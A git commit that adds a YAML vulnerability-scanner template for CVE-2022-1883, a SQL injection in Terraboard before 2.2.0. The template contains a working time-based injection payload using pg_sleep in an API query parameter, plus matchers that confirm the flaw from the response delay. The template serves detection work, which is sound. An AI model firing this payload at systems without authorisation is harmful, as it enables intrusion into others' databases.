Merge pull request #5579 from edoardottt/CVE-2022-1883

Add CVE-2022-1883
2022-11-26 21:11:20 +05:30 · 2022-11-26 21:11:20 +05:30 · e2f5f60795
parent 22508f670b 7ba039a843
commit e2f5f60795
1 changed files with 38 additions and 0 deletions
--- a/cves/2022/CVE-2022-1883.yaml
+++ b/cves/2022/CVE-2022-1883.yaml
@ -0,0 +1,38 @@
+id: CVE-2022-1883
+
+info:
+  name: Terraboard < 2.2.0 - SQL Injection
+  author: edoardottt
+  severity: critical
+  description: |
+    SQL Injection in GitHub repository camptocamp/terraboard prior to 2.2.0.
+  reference:
+    - https://huntr.dev/bounties/a25d15bd-cd23-487e-85cd-587960f1b9e7/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-1883
+  classification:
+    cve-id: CVE-2022-1883
+  tags: cve,cve2022,terraboard,sqli
+
+requests:
+  - raw:
+      - |
+        @timeout: 10s
+        GET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(10))+ISNULL-- HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=5'
+
+      - type: word
+        part: body
+        words:
+          - '"page":'
+          - '"results":'
+        condition: and
+
+      - type: status
+        status:
+          - 200